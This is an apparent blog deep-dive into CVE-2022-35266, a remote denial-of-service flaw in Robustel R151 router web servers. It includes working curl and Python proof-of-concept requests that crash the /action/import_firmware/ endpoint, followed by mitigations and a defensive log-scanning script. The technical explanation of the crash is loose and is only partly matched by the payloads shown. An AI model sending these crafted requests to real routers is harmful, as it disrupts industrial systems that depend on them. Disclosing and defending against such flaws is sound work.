In late 2022, a denial-of-service (DoS) vulnerability was disclosed in Robustel R151 industrial routers running firmware versions 3.1.16 and 3.3. The vulnerability, tracked as CVE-2022-35266, can be triggered remotely and crashes the device's web server, which disrupts management of the industrial systems that depend on these routers.
If you manage or deploy Robustel R151 routers, this deep-dive will help you understand the root of the problem, how it can be triggered, and what you can do about it.
What Is CVE-2022-35266?
The Robustel R151 exposes an embedded web server for configuration and management. One of its handlers processes file uploads posted to the endpoint /action/import_firmware/. Because the web server's hashFirst functionality mishandles specially crafted requests, an attacker can crash the web server and so deny any further management of the device through the web interface.
> TL;DR?
> A remote attacker can crash your router's web interface (and possibly affect other networking functions that depend on it) just by sending crafted network requests, with no login required in some cases.
Vulnerable Endpoint
- /action/import_firmware/
How Does The Exploit Work?
The /action/import_firmware/ endpoint lets administrators upload firmware images for updates. The web server passes the uploaded body through a C function that computes a hash (the hashFirst functionality) before the firmware is verified or stored.
If that processing receives malformed multipart data or an unexpectedly long boundary value, it can:
- overrun its buffer (a crash caused by memory corruption or by uncontrolled resource consumption), or
- segfault (terminate on an invalid memory access).
Either way, a specially crafted POST request to /action/import_firmware/ takes the web server down remotely, and it stops responding.
Exploit Details and Example
You can test or demonstrate this crash using simple tools like curl or Python with the requests library.
*WARNING: do this only in a controlled environment! It will crash the router's management interface.*
Example Exploit Using cURL
```bash
curl -X POST --max-time 10 http://ROUTER-IP/action/import_firmware/ \
  -H "Content-Type: multipart/form-data; boundary=--------------------51234567890123456789" \
  --data-binary $'----------------------51234567890123456789\r\nContent-Disposition: form-data; name="file"; filename="exploit"\r\nContent-Type: application/octet-stream\r\n\r\nCRASHME\r\n----------------------51234567890123456789--'
```
The key here is the boundary string together with the unexpected file content; each part delimiter in the body is "--" followed by the boundary declared in the Content-Type header, and that framing drives the request into the vulnerable code path. The public CVE record notes that a sequence of requests can be needed to trigger the crash, so repeat the request if a single one does not take the server down. Once it has, curl will time out or report a dropped connection instead of receiving an HTTP response.
Simple Python Example
```python
import requests

url = "http://ROUTER-IP/action/import_firmware/"  # replace ROUTER-IP with the router's address
boundary = "--------------------51234567890123456789"
headers = {
    "Content-Type": f"multipart/form-data; boundary={boundary}"
}
# The multipart body is built by hand so the boundary framing is exactly what we
# send: every part delimiter is "--" plus the boundary from the Content-Type header.
data = (
    f"--{boundary}\r\n"
    'Content-Disposition: form-data; name="file"; filename="crash"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "THIS WILL CRASH\r\n"
    f"--{boundary}--\r\n"
).encode("ascii")

try:
    resp = requests.post(url, headers=headers, data=data, timeout=10)
    print("Server answered with status", resp.status_code)
except requests.exceptions.RequestException as exc:
    # A dropped connection or a timeout is the expected symptom once the web server is down.
    print("No valid response (web server may have crashed):", exc)
```
Change ROUTER-IP to your router's actual address. A connection error or timeout instead of an HTTP response is the sign that the web server has gone down.
Mitigation & Fix
There is no official patch at time of writing for 3.1.16 or 3.3.
Actions you can take
- Never expose management interfaces (web, SSH, Telnet) to untrusted networks or the public internet; keep them on a dedicated management network or behind a VPN.
- Restrict access to the router's web interface by source address at the network firewall. Blocking a specific path such as /action/import_firmware/ needs an HTTP-aware reverse proxy or WAF in front of the device, because a packet filter cannot see URLs.
- Monitor for POST requests to /action/import_firmware/ that do not come from your administrators' hosts, and treat repeated requests from one source as a likely attack.
- Contact Robustel support for updates or mitigations.
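As an added example (not code from the original post or from Robustel), here is a small Python checker for the monitoring point above. It scans access-log lines in Common Log Format, as a reverse proxy or HTTP-aware gateway placed in front of the router might record them, flags POSTs to /action/import_firmware/ from outside the management subnet, and reports sources that repeated the request. The log lines, the 10.0.5.0/24 admin subnet and the client addresses are all constructed for the example; the Robustel web server's own log format is not covered here.

```python
import ipaddress
import re

# Constructed sample: Common Log Format lines as a reverse proxy in front of the
# router might record them (not real Robustel logs). The first POST from
# 198.51.100.77 gets a 200; the proxy then returns 502 because the router's web
# server no longer answers.
SAMPLE_LOG = """\
10.0.5.12 - - [25/Oct/2022:17:20:01 +0000] "GET /login HTTP/1.1" 200 1532
10.0.5.12 - - [25/Oct/2022:17:20:09 +0000] "POST /action/import_firmware/ HTTP/1.1" 200 88
198.51.100.77 - - [25/Oct/2022:17:21:44 +0000] "POST /action/import_firmware/ HTTP/1.1" 200 88
198.51.100.77 - - [25/Oct/2022:17:21:45 +0000] "POST /action/import_firmware/ HTTP/1.1" 502 0
198.51.100.77 - - [25/Oct/2022:17:21:46 +0000] "POST /action/import_firmware/ HTTP/1.1" 502 0
203.0.113.9 - - [25/Oct/2022:17:22:10 +0000] "GET /action/import_firmware/ HTTP/1.1" 405 0
this line is not a log record
"""

VULNERABLE_PATH = "/action/import_firmware/"

# Hosts allowed to upload firmware: an assumed management subnet for this example.
ADMIN_NETS = [ipaddress.ip_network("10.0.5.0/24")]

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def is_admin_source(src, admin_nets=ADMIN_NETS):
    """True if src is a valid IP address inside one of the management networks."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in admin_nets)


def find_suspicious_uploads(lines, admin_nets=ADMIN_NETS):
    """Return (src, timestamp, status) for every POST to the vulnerable endpoint
    sent from a host outside the management networks."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] != "POST" or rec["path"] != VULNERABLE_PATH:
            continue
        if is_admin_source(rec["src"], admin_nets):
            continue
        hits.append((rec["src"], rec["ts"], rec["status"]))
    return hits


def burst_sources(hits, threshold=2):
    """Sources that sent at least `threshold` suspicious POSTs. The CVE record
    notes a sequence of requests can be needed, so repeats are the stronger signal."""
    counts = {}
    for src, _ts, _status in hits:
        counts[src] = counts.get(src, 0) + 1
    return sorted(src for src, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = find_suspicious_uploads(SAMPLE_LOG.splitlines())
    for src, ts, status in hits:
        print(f"{ts} suspicious POST {VULNERABLE_PATH} from {src} (status {status})")
    print("repeat offenders:", burst_sources(hits))
```

Run it against your proxy's access log instead of SAMPLE_LOG and adjust ADMIN_NETS to your management subnet; a run of 502s following a POST to the endpoint is the pattern you would expect to see after the web server has been crashed.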
References
- Original CVE Record: CVE-2022-35266
- Packet Storm Security Advisory
- Robustel R151 Product Page
- Full Disclosure Mailing List: Robustel DoS
Conclusion
CVE-2022-35266 can bring down management for critical industrial routers with a handful of POST requests, even from the LAN. Security best practice is *never* to expose device management to public networks, but even internally, a compromised host or careless behaviour could allow this attack.
Mitigate by restricting access to the web interface, monitoring for requests to the vulnerable endpoint, and seeking firmware updates from the vendor.
Stay safe and keep your infrastructure resilient!
*If you have questions or need more defensive strategies, drop a comment below.*
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 05/16/2023 22:36:00 UTC